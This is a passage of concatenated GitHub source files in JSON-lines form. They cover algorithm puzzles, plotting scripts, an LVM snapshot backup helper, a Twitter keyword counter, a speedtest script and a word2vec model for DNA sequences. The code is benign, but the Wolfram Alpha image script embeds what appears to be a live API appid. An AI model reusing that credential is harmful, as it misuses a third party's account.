minimumDistance(self, word: str) -> int:\n \n \n def distance(x,y):\n r1,c1 = (ord(x) - ord('A')) // 6,(ord(x) - ord('A')) % 6\n r2,c2 = (ord(y) - ord('A')) // 6,(ord(y) - ord('A')) % 6\n return abs(r1 - r2) + abs(c1 - c2) \n \n \n @cache\n def dfs(i,f1,f2):\n \n if i >= len(word):\n return 0\n \n res = float('inf')\n \n if f1 != '':\n #move finger1\n res = min(res, dfs(i + 1,word[i], f2) + distance(f1,word[i]))\n else:\n res = min(res, dfs(i + 1,word[i], f2))\n if f2 != '':\n #move finger2\n res = min(res, dfs(i + 1,f1, word[i]) + distance(f2,word[i]))\n else:\n res = min(res, dfs(i + 1,f1, word[i]))\n \n \n 
return res\n \n return dfs(0,'','')","repo_name":"tannerr12/Data-Structures-and-Algorithms","sub_path":"1320-minimum-distance-to-type-a-word-using-two-fingers/1320-minimum-distance-to-type-a-word-using-two-fingers.py","file_name":"1320-minimum-distance-to-type-a-word-using-two-fingers.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"10618705376","text":"from decimal import *\r\nfrom datetime import *\r\nfrom Tarifa import *\r\n\r\ndef calcularPrecio(tarifa, tiempoDeTrabajo):\r\n \r\n precioSemana = tarifa.getPrecio()\r\n precioFindeSemana = tarifa.getPrecio()\r\n \r\n \r\n #Chequeamos que los valores sean validos.\r\n if (precioSemana < 0):\r\n raise ValueError('La tarifa de la semana no debe ser negativa',precioSemana)\r\n \r\n if (precioFindeSemana < 0):\r\n raise ValueError('La tarifa del fin de semana no debe ser negativa',precioFindeSemana)\r\n \r\n if (tiempoDeTrabajo[1] < tiempoDeTrabajo[0]):\r\n raise ValueError('Tiempo de trabajo negativo!',tiempoDeTrabajo[0],tiempoDeTrabajo[1])\r\n \r\n aux = (tiempoDeTrabajo[1] - tiempoDeTrabajo[0])\r\n \r\n if (aux < timedelta(minutes=15)):\r\n raise ValueError('Tiempo de trabajo menor a 15 minutos!',tiempoDeTrabajo[0],tiempoDeTrabajo[1])\r\n \r\n if (aux > timedelta(days=7)):\r\n raise ValueError('El Tiempo de trabajo debe ser menor a 7 dias',tiempoDeTrabajo[0],tiempoDeTrabajo[1])\r\n \r\n #Inicializamos valores para el ciclo\r\n aux = tiempoDeTrabajo[0]\r\n aux2 = timedelta(hours=1)\r\n prevDay = 0\r\n tarifa = Decimal(0)\r\n \r\n \r\n while (aux < tiempoDeTrabajo[1]):\r\n \r\n #Se suman las tarifas en caso de ser cualquier dia (0 siendo lunes, 6 siendo domingo)\r\n if (aux.weekday() < 5):\r\n tarifa += precioSemana\r\n else:\r\n tarifa += precioFindeSemana\r\n\r\n\r\n # Estos proximos ifs implementan el cambio de precio cuando se va de un dia de semana\r\n # a uno que es fin de semana y viceversa \r\n if (prevDay == 6 and aux.weekday() == 0):\r\n tarifa += precioSemana\r\n elif (prevDay == 4 and aux.weekday() == 5):\r\n tarifa += precioFindeSemana\r\n \r\n prevDay = aux.weekday()\r\n aux += aux2\r\n \r\n return tarifa","repo_name":"Imme2/SoftwareTarea2","sub_path":"calcularPrecio.py","file_name":"calcularPrecio.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"4504416080","text":"import requests\nimport json\n\ndef find_proper_image(json_result):\n pods = json_result[\"queryresult\"][\"pods\"]\n for pod in pods:\n if \"Visual representation of\" in pod[\"title\"]:\n return pod[\"subpods\"][0][\"img\"][\"src\"]\n if \"illustration\" in pod[\"title\"]:\n return pod[\"subpods\"][0][\"img\"][\"src\"]\n return None\n\ndef save_image(query, filename):\n base_url = \"http://api.wolframalpha.com/v2/query\"\n params = {\n \"input\": query,\n \"format\": \"image\",\n \"output\": \"JSON\",\n \"appid\": \"QQ9932-7PXA4JPRGK\",\n }\n\n response = requests.get(base_url, params=params)\n\n if response.status_code == 200:\n result = response.json()\n\n else:\n print(f\"Error: {response.status_code} - {response.text}\")\n return 0\n\n url = find_proper_image(result)\n if url is None:\n print(\"No valid url found\")\n return 0\n \n response = requests.get(url)\n\n if response.status_code == 200:\n # The file content is stored in response.content\n with open(filename, \"wb\") as f:\n 
f.write(response.content)\n print(\"File downloaded successfully.\")\n return 1\n else:\n print(f\"Failed to download the file. Status code: {response.status_code}\")\n return 0\n\n# with open(\"sample.json\", \"w\") as outfile:\n# outfile.write(json.dumps(result[\"queryresult\"][\"pods\"], indent=4))","repo_name":"zacn04/Scribe","sub_path":"latex_to_response/image_handling.py","file_name":"image_handling.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26943721059","text":"# coding:utf-8\nimport os,re\n'''\n所有文件路径创建\n'''\n\n#获取根路径\ndef Root_path():\n file_address=os.path.dirname(os.path.realpath(__file__)).replace('\\\\', '/')\n root_Path=re.search(r'(.*)Public_methods',file_address)\n return root_Path.group(1)\n\n#confing路径\ndef crg_path():\n crg_file=os.path.join(Root_path(),'Public_methods/crg_file/')\n if not os.path.exists(crg_file):os.makedirs(crg_file)\n ini_file=crg_file+'crg_file.ini'\n return ini_file\n\n\n\nif __name__=='__main__':\n print(crg_path())\n","repo_name":"270466585/my_django","sub_path":"Public_methods/file_path.py","file_name":"file_path.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36778492694","text":"#!/usr/bin/env python3\n\n# SPDX-License-Identifier: MIT\n\n'''\nfile : plot_electric_field\ndate : 17/07/2023\n\nDiagnostic for (X,Y,Vx,Vy) geometry\n\n-----> Simple usage: python3 plot_electric_field.py ../../../build/simulations/geometryXYVxVy/landau/ --itime 10 \n-----> Animation: python3 plot_electric_field.py ../../../build/simulations/geometryXYVxVy/landau/ --gif True\n\n'''\n\n# pylint: disable=invalid-name\n# pylint: disable=wrong-import-order\n\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nfrom scipy import interpolate, stats\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nfrom gysdata import DiskStore\nfrom plot_utils import plot_field2d\n\nimport imageio.v2 as imageio\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n description='Plots the electric field')\n parser.add_argument('data_dir',\n action='store',\n nargs='?',\n default=Path.cwd(),\n type=Path,\n help='location of the results')\n parser.add_argument('--gif',\n action='store',\n default=False,\n type=bool,\n help='produce animation')\n parser.add_argument('--itime',\n action='store',\n default=-1,\n type=int,\n help='time index')\n parser.add_argument('--grate',\n metavar='',\n action='store',\n default=-0.1533,\n type=float,\n help='theoritical growth rate')\n\n args = parser.parse_args()\n\n # Load data\n theo_rate = args.grate\n data_structure_name = 'data_structure_XYVxVy.yaml'\n ds = DiskStore(args.data_dir, data_structure=Path(data_structure_name))\n epot = ds['electrostatic_potential']\n fdistribu = ds['fdistribu']\n Ex = -epot.differentiate('x')\n Ey = -epot.differentiate('y')\n Timer = epot.shape[0]\n time_init = epot.coords['time'].values[0]\n time_diag = epot.coords['time'].values[args.itime]\n time_final = epot.coords['time'].values[-1]\n\n output_filename = os.path.join(Path.cwd(), f'electric_energy_t{time_diag}.png')\n data_dict = {f't={time_init}': epot.sel(time=time_init),\n f't={time_diag}': epot.sel(time=time_diag)}\n\n def plot_electric_potential(itime):\n '''\n Plot electric potential\n '''\n output_filename_epot = os.path.join(Path.cwd(), 'electric_potential.png')\n plot_field2d(epot[itime,:,:].T , '', 
output_filename_epot, cmap='jet', scale='linear')\n\n\n def plot_electric_field(itime):\n '''\n Plot electric field\n '''\n\n output_filename_Ex = os.path.join(Path.cwd(), 'electric_field_x.png')\n plot_field2d(Ex[itime-1,:,:].T , '', output_filename_Ex, cmap='jet', scale='linear')\n\n output_filename_Ey = os.path.join(Path.cwd(), 'electric_field_y.png')\n plot_field2d(Ey[itime-1,:,:].T , '', output_filename_Ey, cmap='jet', scale='linear')\n\n def plot_electric_energy_density_field(itime):\n '''\n Plot electric energy density field\n '''\n\n z = np.power(Ex[itime-1,:,:],2)+np.power(Ey[itime-1,:,:],2)\n output_filename_U = os.path.join(Path.cwd(), 'electric_energy_density_field.png')\n plot_field2d(z, '', output_filename_U, cmap='jet', scale='linear')\n\n\n def compute_electric_energy():\n '''\n Before displaying energy we have to perform a two-dimensional integration.\n For that we first interpolate the Electric field over the x,y plane.\n '''\n\n Energy = np.zeros(Timer)\n for k in range(1,Timer):\n z = np.power(Ex[k,:,:],2)+np.power(Ey[k,:,:],2)\n val = interpolate.RectBivariateSpline(epot.coords['x'].to_numpy(),\n epot.coords['y'].to_numpy(),z)\n Energy[k] = val.integral(epot.coords['x'].values[0], epot.coords['x'].values[-1],\n epot.coords['y'].values[0],epot.coords['y'].values[-1])\n return Energy\n\n def plot_electric_energy():\n '''\n Plot potential energy.\n '''\n\n Energy = compute_electric_energy()\n Emaxval = []\n tm = []\n for k in range(5,len(Energy)-2):\n if((Energy[k+1]-Energy[k-1])/Energy[k]< 0.05 and\n (Energy[k]-Energy[k-2])/Energy[k]> 0.1 and (Energy[k]-Energy[k+2])/Energy[k]>0.1):\n Emaxval.append(Energy[k])\n tm.append(epot.coords['time'].values[k])\n\n Emax = np.array(Emaxval)\n tm = np.array(tm)\n if Emax.size>0:\n res = stats.linregress(tm,np.log(np.sqrt(Emax)))\n print(f'relative error on growth rate {(theo_rate-res[0]) /abs(res[0]):0.2f}')\n plt.clf()\n plt.plot(epot.coords['time'].values,np.log(np.sqrt(Energy)))\n plt.scatter(tm ,np.log(np.sqrt(Emax)),c='red')\n if Emax.size>0:\n plt.plot(tm ,tm*res[0]+res[1] ,c='green')\n plt.title(f'growthrate: {res[0]:0.3f} (theory: {theo_rate:0.3f})', fontsize=16)\n plt.ylabel('Electric energy', fontsize=12)\n plt.xlabel('time', fontsize=12)\n plt.savefig('Electric_energy.png')\n\n def plot_fdist(itime,Vx,Vy):\n '''\n Plot the initial distribution function in (X,Y) fo a fixed (Vx, Vy) velocity position.\n '''\n\n plt.clf()\n fig = plt.figure()\n ax = fig.add_subplot()# 111,projection='3d')\n im = ax.imshow(fdistribu[itime,0,:,:,Vx,Vy] )\n fig.colorbar(im)\n plt.title('initial distribution function at Vx='+str(Vx)+' Vy='+str(Vy))\n plt.savefig('test_fdistribution.png')\n\n if (not(args.gif)):\n plot_electric_potential(args.itime)\n plot_electric_field(args.itime)\n plot_electric_energy_density_field(args.itime)\n plot_electric_energy()\n plot_fdist(args.itime,31,31)\n\n else:\n min_efield = min([np.min(Ex),np.min(Ey)]).compute()\n max_efield = max([np.max(Ex),np.max(Ey)]).compute()\n min_epot = np.min(epot).compute()\n max_epot = np.max(epot).compute()\n min_energy_den = np.min(np.power(Ex,2)+np.power(Ey,2)).compute()\n max_energy_den = np.max(np.power(Ex,2)+np.power(Ey,2)).compute()\n\n images = []\n for itime in range(Timer):\n plot_field2d(epot[itime-1,:,:].T , '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_epot, vmax=max_epot, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_potential.gif', images)\n\n images = []\n for itime in 
range(Timer):\n plot_field2d(Ex[itime-1,:,:].T , '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_efield, vmax=max_efield, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_field_x.gif', images)\n\n images = []\n for itime in range(Timer):\n plot_field2d(Ey[itime-1,:,:].T , '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_efield, vmax=max_efield, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_field_y.gif', images)\n\n images = []\n for itime in range(Timer):\n z = np.power(Ex[itime-1,:,:],2)+np.power(Ey[itime-1,:,:],2)\n plot_field2d(z, '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_energy_den, vmax=max_energy_den, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_energy_density_field.gif', images)\n","repo_name":"gyselax/gyselalibxx","sub_path":"post-process/PythonScripts/geometryXYVxVy/plot_electric_field.py","file_name":"plot_electric_field.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"22"} +{"seq_id":"20645903731","text":"import logging\nimport time\nfrom functools import wraps\nfrom typing import Any, Callable\n\nlogger = logging.getLogger()\n\n\ndef backoff(\n exceptions: tuple,\n start_sleep_time: float = 0.1,\n factor: int = 2,\n border_sleep_time: int = 10,\n log: logging = logger\n) -> Callable[..., Any]:\n \"\"\"\n Функция для повторного выполнения функции через некоторое время,\n если возникла ошибка. Использует наивный экспоненциальный рост\n времени повтора (factor) до граничного времени ожидания\n (border_sleep_time)\n\n Формула:\n t = start_sleep_time * 2^(n) if t < border_sleep_time\n t = border_sleep_time if t >= border_sleep_time\n :param exceptions: перехватываемые исключения\n :param start_sleep_time: начальное время повтора\n :param factor: во сколько раз нужно увеличить время ожидания\n :param border_sleep_time: граничное время ожидания\n :param log: объект логгирования\n :return: результат выполнения функции\n \"\"\"\n\n def func_wrapper(func):\n @wraps(func)\n def inner(*args, **kwargs):\n t = start_sleep_time\n while True:\n try:\n return func(*args, **kwargs)\n except exceptions as err:\n log.exception(err)\n t = t * factor\n if t > border_sleep_time:\n t = border_sleep_time\n time.sleep(t)\n\n return inner\n\n return func_wrapper\n","repo_name":"Oorzhakau/new_admin_panel_sprint_3","sub_path":"etl/utils/backoff.py","file_name":"backoff.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"8201307291","text":"import sys\nfrom pylab import *\nimport matplotlib.patches as mpatches\n\nfilename = \"Software_HighestResolution_AverageResolution.csv\"\n\n# Data Reading and Checking \nlines = open(filename, \"r\").readlines();\nX = [line.strip().split(\",\")[0] for line in lines]\nhighest = [line.strip().split(\",\")[1] for line in lines]\naverage = [line.strip().split(\",\")[3] for line in lines]\nX.pop(0)\nhighest.pop(0)\naverage.pop(0)\n\nhighest = [float(y) for y in highest]\naverage = [float(y) for y in average]\n\nwidth = 0.3\nhighestPos = [x + width / 2 for x in range(len(X))]\naveragePos = [x + width / 2 * 3 for x in range(len(X))]\n\nfigure(figsize = (10, 5), dpi = 80)\n\nbar(highestPos, highest, width, color = \"red\", alpha = 
0.5)\nbar(averagePos, average, width, color = \"blue\", alpha = 0.5)\n\nfor i in range(len(X)):\n text(highestPos[i] - 0.03, highest[i] + 0.3, \"%2.1f\"%highest[i])\n text(averagePos[i] - 0.03, average[i] + 0.3, \"%2.1f\"%average[i])\n\nxticks(averagePos, X)\nylabel(r\"Resolution $\\AA$\")\n\nred_patch = mpatches.Patch(color = \"red\", label = \"Highest Resolution\", alpha =\n 0.5)\nblue_patch = mpatches.Patch(color = \"blue\", label = \"Average Resolution\", alpha\n = 0.5)\n\nlegend(handles = [red_patch, blue_patch])\n\nsavefig(\"Software_Resolution.png\", dpi = 200)\nshow()\n","repo_name":"Zarrathustra/Script","sub_path":"Plot_Scripts/Software_Resolution_Plot.py","file_name":"Software_Resolution_Plot.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36904056606","text":"from os.path import islink\nimport subprocess\nimport mysql_backup.mysql_backup\n\n\nclass LvSnapshot:\n \"\"\"Class to manage lv snapshots\"\"\"\n\n backup_logger = None\n\n def __init__(self, vg, lv, snapshot_name, size_gb):\n \"\"\"provide vg,lv, snapshot_name, and size_mb (snapshot allocation size) to this constructor\"\"\"\n\n self.vg = vg\n self.lv = lv\n self.snapshot_name = snapshot_name\n self.size_gb = size_gb\n LvSnapshot.backup_logger = mysql_backup.mysql_backup.MysqlBackup.backup_logger\n\n def __str__(self):\n return \"/\" + self.vg + \"/\" + self.lv + \"/\" + self.snapshot_name + \" snapshot instance\"\n\n def get_snapshot_status(self, is_mounted=False):\n \"\"\"return: Bool\n Whether or not a snapshot already exists. If is_mounted is True\n will return True only when the snapshot exists and is mounted.\"\"\"\n if not is_mounted:\n return islink('/dev/'+self.vg+'/'+self.snapshot_name)\n elif islink('/dev/'+self.vg+'/'+self.snapshot_name):\n cmd = ['/sbin/lvdisplay', '-c', '/dev/'+self.vg+'/'+self.snapshot_name,]\n output = int(subprocess.check_output(cmd, close_fds=True).split(':')[5])\n if output:\n return True\n else:\n return False\n else:\n return False\n\n def ensure_snapshot_exists(self):\n \"\"\"return: void\n Ensures a snapshot exists or raises an IOError\"\"\"\n\n if not self.get_snapshot_status():\n\n cmd = ['/sbin/lvcreate', '--snapshot', '-L', str(self.size_gb)+'G', '--name', self.snapshot_name,\n '/dev/'+self.vg+'/'+self.lv]\n\n LvSnapshot.backup_logger.info(\"Snapshot does not exist. Attempting the following command:\\n \" + \" \".join(cmd),\n extra={'object': self})\n\n lv_snap = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)\n lv_snap.wait()\n\n if not self.get_snapshot_status():\n raise IOError(\"Failed to create snapshot named %s at /dev/%s/%s of size %d\" %\n (self.snapshot_name, self.vg, self.lv, self.size_gb))\n\n def delete_snapshot(self):\n \"\"\"Remove a snapshot. Will raise IOError on failure.\"\"\"\n\n if self.get_snapshot_status(is_mounted=True):\n raise IOError(\"Failed to delete snapshot. 
Snapshot is currently mounted.\")\n\n if self.get_snapshot_status():\n\n cmd = ['/sbin/lvremove', '-f', '/dev/'+self.vg+'/'+self.snapshot_name]\n\n LvSnapshot.backup_logger.info(\"Removing snapshot with the following command: \\n\" + ' '.join(cmd), extra={'object': self})\n\n lv_snap = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)\n lv_snap.wait()\n\n if self.get_snapshot_status():\n msg = \"Failed to delete the snapshot.\"\n LvSnapshot.backup_logger.error(msg, extra={'object': self})\n raise IOError(msg)\n\n else:\n msg = \"Failed to delete snapshot. Snapshot does not exist.\"\n LvSnapshot.backup_logger.error(msg, extra={'object': self})\n raise IOError(msg)\n\n def safe_refresh_snapshot(self):\n \"\"\"If the snapshot is not mounted, delete it and recreate it\"\"\"\n\n LvSnapshot.backup_logger.info(\"Begin refreshing snapshot at /dev/%s/%s\" % (self.vg, self.snapshot_name),\n extra={'object': self})\n\n if not self.get_snapshot_status(is_mounted=True):\n\n LvSnapshot.backup_logger.debug(\"Snapshot is not mounted.\", extra={'object': self})\n\n if self.get_snapshot_status():\n LvSnapshot.backup_logger.debug(\"Snapshot exists. Deleting it.\", extra={'object': self})\n self.delete_snapshot()\n else:\n LvSnapshot.backup_logger.debug(\"Snapshot did not exist. Nothing to delete.\", extra={'object': self})\n\n LvSnapshot.backup_logger.info(\"Snapshot now removed if it was there. Ensuring one exists.\", extra={'object': self})\n\n self.ensure_snapshot_exists()\n\n else:\n LvSnapshot.backup_logger.info(\"Snapshot was mounted, not refreshing it.\", extra={'object': self})\n\n if not self.get_snapshot_status():\n msg = \"Snapshot still does not exist. Something went bad.\"\n LvSnapshot.backup_logger.error(msg, extra={'object': self})\n raise IOError(msg)\n else:\n msg = \"Snapshot verified to exist.\"\n LvSnapshot.backup_logger.info(msg, extra={'object': self})\n","repo_name":"dmatthewsbnd251/mysql-backup","sub_path":"lv_snapshot/lv_snapshot.py","file_name":"lv_snapshot.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"22862189358","text":"# 必要なモジュールのimport\nimport pandas as pd\nimport tweepy\n# 各種ツイッターのキーをセット\n# 各種ツイッターのキーをセット consumer_key, consumer_secret, access_key, access_secret\nconsumer_key = \"\"\nconsumer_secret = \"\"\naccess_key = \"\"\naccess_secret = \"\"\n# 認証のためのAPIキーをセット\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_key, access_secret)\napi = tweepy.API(auth, wait_on_rate_limit=True) # API利用制限にかかった場合、解除まで待機する\n\n\ndef main():\n '''\n メインの実行部分\n '''\n\n # 調べる言語のリストの用意\n languages = [\"JavaScript\", \"Python\", \"TypeScript\", \"Java\", \"C++\", \"Go\",\n \"Rust\", \"C\", \"Shell\", \"Vue\", \"Dart\", \"CSS\", \"C#\", \"PHP\",\n \"Clojure\", \"Assembly\", \"Ruby\"]\n like = []\n # for文を使ってリストに入っている言語ごとにデータを取得していく 取得するデータは今日から過去7日以内\n for language in languages:\n tweet_data = get_search_tw(language, '2021-03-20_00:00:00_JST',\n '2021-03-21_00:00:00_JST', 1, 50)\n # 取得したデータからデータフレームを作成\n df = make_df(tweet_data)\n # いいね数の総和を求めてリストに追加\n like.append(df['いいね数'].sum())\n # 言語ごとのいいね数を出力する\n print(f'{language}の合計いいね数は{df[\"いいね数\"].sum()}')\n # 言語名といいね数の情報からデータフレームを作成する\n df = pd.DataFrame({'言語': languages, 'いいね数': like})\n # いいね数の多い順にデータを並べ変える\n print('結果')\n print(df.sort_values(by='いいね数', ascending=False))\n # 期間を指定して、ツイートを収集する関数\n\n\ndef get_search_tw(search, since, until, recount, count):\n '''\n 
今日から過去7日間の期間を指定して、ツイートを収集する関数\n ツイートのデータをapi.searchを使って収集\n '''\n\n # 検索キーワード。 リツイートは除く\n searchkey = search + '-filter:retweets'\n # ツイート取得\n # APIのtweepy.Cursorのキーワードサーチ(api.search)を使う\n tweets = tweepy.Cursor(api.search, q=searchkey, since=since,\n until=until, tweet_mode=\"extended\", lang='ja'\n ).items(count)\n # ツイートデータを入れる空のリストを用意\n tweet_data = []\n # いいねとリツイートの合計がrecuont以上なら次からの処理をする\n for tweet in tweets:\n if tweet.retweet_count + tweet.favorite_count >= recount:\n tweet_data.append([search, tweet.favorite_count])\n return tweet_data\n\n\n'''\n ツイートデータを番号と共に出力\n '''\n\n\ndef make_df(tweet_data):\n '''\n ツイートのデータからデータフレームを作成\n '''\n\n # 各ツイートデータを入れるための空のリストを用意\n list_language = []\n list_favorite = []\n i = 0\n # ツイートの各アイテムを入れるリストを作成\n for i in range(len(tweet_data)):\n list_language.append(tweet_data[i][0])\n list_favorite.append(tweet_data[i][1])\n i += 1\n # 上で作成したリストからツイートを入れるデータフレームの作成\n df = pd.DataFrame({'言語': list_language, 'いいね数': list_favorite})\n return df\n\n\n# 実行部分\nif __name__ == '__main__':\n main()\n","repo_name":"Sebun-Takahashi/Python-training","sub_path":"language-rank/tweetkeaworddate-copy.py","file_name":"tweetkeaworddate-copy.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31591868811","text":"#pip install speedtest-cli\nimport speedtest as sp\nimport sys\n\ntest = sp.Speedtest()\n\ndown = test.download()\nrsDown = round(down)\nfDown = int(rsDown/1e+6)\n\nupload = test.upload()\nrsUp = round(upload)\nfUp=int(rsUp/1e+6)\n\nprint(f\"Down:{fDown} mb/Up:{fUp} mb\")\n\n","repo_name":"vaesanti/scripts","sub_path":"veloz.py","file_name":"veloz.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41412023159","text":"import numpy as np\nfrom collections import defaultdict\nfrom pathlib import Path\n\nDIRECTIONS = {'e' : np.array([1,0]) , 'se':np.array([0,1]), 'sw':np.array([-1,1]),\n 'w':np.array([-1,0]), 'nw':np.array([0,-1]), 'ne':np.array([1,-1])}\n\ndef get_starting_black_tiles(tot_commands):\n tiles = defaultdict(int)\n for command in tot_commands:\n current_pos = np.array([0,0])\n for direction in command:\n current_pos += DIRECTIONS[direction]\n tiles[tuple(current_pos)] += 1\n return set([key for key,val in tiles.items() if val % 2])\n\ndef neighbors(tile):\n for direction in DIRECTIONS.values():\n yield tuple(tile + direction)\n\ndef get_num_of_neighbors(tile, tiles):\n return len([neighbor for neighbor in neighbors(tile) if tuple(neighbor) in tiles])\n\ndef part2_iteration(tiles):\n new_tiles = set()\n for tile in tiles:\n num_neighbors = get_num_of_neighbors(tile,tiles)\n if 0 < num_neighbors <= 2:\n new_tiles.add(tile)\n for neighbor in neighbors(tile):\n if tuple(neighbor) not in tiles and get_num_of_neighbors(neighbor,tiles) == 2:\n new_tiles.add(neighbor)\n return new_tiles\n\ndef parse_input(inp):\n total_commands = []\n for line in inp.splitlines():\n commands = []\n tmp = ''\n for char in line:\n tmp += char\n if tmp in DIRECTIONS:\n commands.append(tmp)\n tmp = ''\n total_commands.append(commands)\n return total_commands\n\ndef run_test():\n inp = 'nwwswee'\n tot_commands = parse_input(inp)\n get_starting_black_tiles(tot_commands) == [(0,0)]\n with open(Path(\"2020\") / \"day24\" / \"day24_test.txt\") as f:\n inp = f.read()\n tot_commands = parse_input(inp)\n tiles = get_starting_black_tiles(tot_commands)\n assert len(tiles) == 10\n assert 
len(part2_iteration(tiles)) == 15\nrun_test()\n\nwith open(Path(\"2020\") / \"day24\" / \"day24_input.txt\") as f:\n inp = f.read()\nblack_tiles = get_starting_black_tiles(parse_input(inp))\nprint(f\"Answer part 1 {len(black_tiles)}\")\n\nfor _ in range(100):\n black_tiles = part2_iteration(black_tiles)\n\nprint(f'Answer part 2 {len(black_tiles)}')\n","repo_name":"GandolfHobbitlord/adventofcode","sub_path":"2020/day24/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12887908679","text":"import re\nfrom torch import nn\nimport itertools as it\nimport torch\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport logging\nimport time\nimport pandas as pd\n\n\n# Begin read file\ndevice = torch.device('cuda:0')\n\ndef read_input():\n file_dir = r'methylation/train.csv'\n training_df = pd.read_csv(file_dir)\n training_seq = training_df['seq'].values.tolist()\n training_datasize = len(training_seq) # count how many sequence\n for i in range(0, training_datasize): # cut a whole sequence in to words\n if 'N' in training_seq[i]:\n training_seq[i] = training_seq[i].replace('N','')\n training_seq[i] = re.findall(r'\\w{5}', str(training_seq[i]))\n return training_seq\n\n# define a dictionary\nclass Separate:\n def __init__(self, kmer_number):\n self.kmer = kmer_number\n\n def build_dict(self):\n alfa = ['A', 'G', 'C', 'T']\n keywords = list(it.product(alfa, repeat=self.kmer)) # generate all the possibility words\n keywords = sorted(keywords)\n s = ''\n all_possibility = []\n for i in range(len(keywords)):\n all_possibility.append(s.join(keywords[i])) # form a list to store all words\n #print(all_possibility)\n vocab, index = {}, 1 # define dictionary\n vocab[''] = 0 # the first word is \n vocab_size = len(all_possibility) # define the size of the dictionary\n for kmer in all_possibility:\n vocab[kmer] = index # assign value to dictionary\n index += 1\n inverse_vocab = {index: kemer for kemer, index in vocab.items()} # define a inverse_dictionary\n #print(inverse_vocab)\n return vocab, inverse_vocab, vocab_size\n\n\n# define center words and context words\nclass def_context():\n def __init__(self,sentence,window):\n self.sentence = sentence # read a sentence\n self.window = window # define a window size\n\n def extract_word(self):\n count = 0 # for reduce the size of dataset\n self.context = [] # pre-define the context\n self.label = [] # pre-define the center word\n for sentence in self.sentence: # read a sentence\n #print('Runing', sentence)\n count += 1\n if count > 50000:\n print('The dataset is too large.')\n break\n for idx, word in enumerate(sentence): # read each word\n # if idx >= self.window and idx <= len(sentence)-self.window-1:\n self.label.append([sentence[idx]]) # This is the center word, aka, each word of a sentence\n small = []\n index = list(range(max(0, idx - self.window), min(len(sentence), idx + 1 + self.window))) # Context idx range\n index.remove(idx) # context remove the center word\n if idx - self.window < 0:\n for m in range(abs(idx - self.window)):\n small.append('')\n small_DNA=[sentence[i] for i in index]\n #print('D', small_DNA[0])\n for kk in range(len(small_DNA)):\n small.append(small_DNA[kk])\n self.context.append(small)\n\n if idx + 1 + self.window-len(sentence) > 0:\n small_DNA=[sentence[i] for i in index]\n #print('D', 
small_DNA[0])\n for kk in range(len(small_DNA)):\n small.append(small_DNA[kk])\n for m in range(abs(idx + 1 + self.window-len(sentence))):\n small.append('')\n self.context.append(small)\n\n if idx - self.window >= 0 and idx + 1 + self.window-len(sentence) <= 0:\n self.context.append([sentence[i] for i in index]) # store the context in a list\n # self.context.append([sentence[i] for i in range(idx-self.window, min(idx+self.window+1)) if i !=idx])\n\n #print(\"Context :\", self.context , \"Target :\", self.label)\n #print(\"Target :\", self.label)\n return self.context, self.label\n\n\n# Construct a data loader\nclass dataloader():\n def __init__(self, vocab, context, label, vocab_size):\n self.vocab = vocab # load the dictionary\n self.context = context # load the context\n self.label = label # load the center word (label)\n self.vocab_size = vocab_size # load the size of words\n\n def __len__(self):\n return len(self.context) # return the size of a batch data\n\n def __getitem__(self, idx): # for each batch\n self.onehot = np.zeros(self.vocab_size+1, dtype=np.float32) # using one-hot encoding to encode label\n context = [self.vocab[word] for word in self.context[idx]] # using dictionary to find the context words\n label = [self.vocab[word] for word in self.label[idx]] # using dictionary to find the center word\n id = self.vocab[self.label[idx][0]] # for each batch, find the center word\n self.onehot[int(str(id))] = 1 # set the one-hot to 1\n #context = context + [0]*(4 - len(context)) # if the size of context word is less than 4,using 0 to fill\n return np.array(context, dtype=np.int), self.onehot\n\n\n# network structure#snp\nclass Word2Vec(nn.Module):\n def __init__(self, vocab_size, embedding_dim, context_size):\n super(Word2Vec, self).__init__()\n vocab_size += 1 # first word 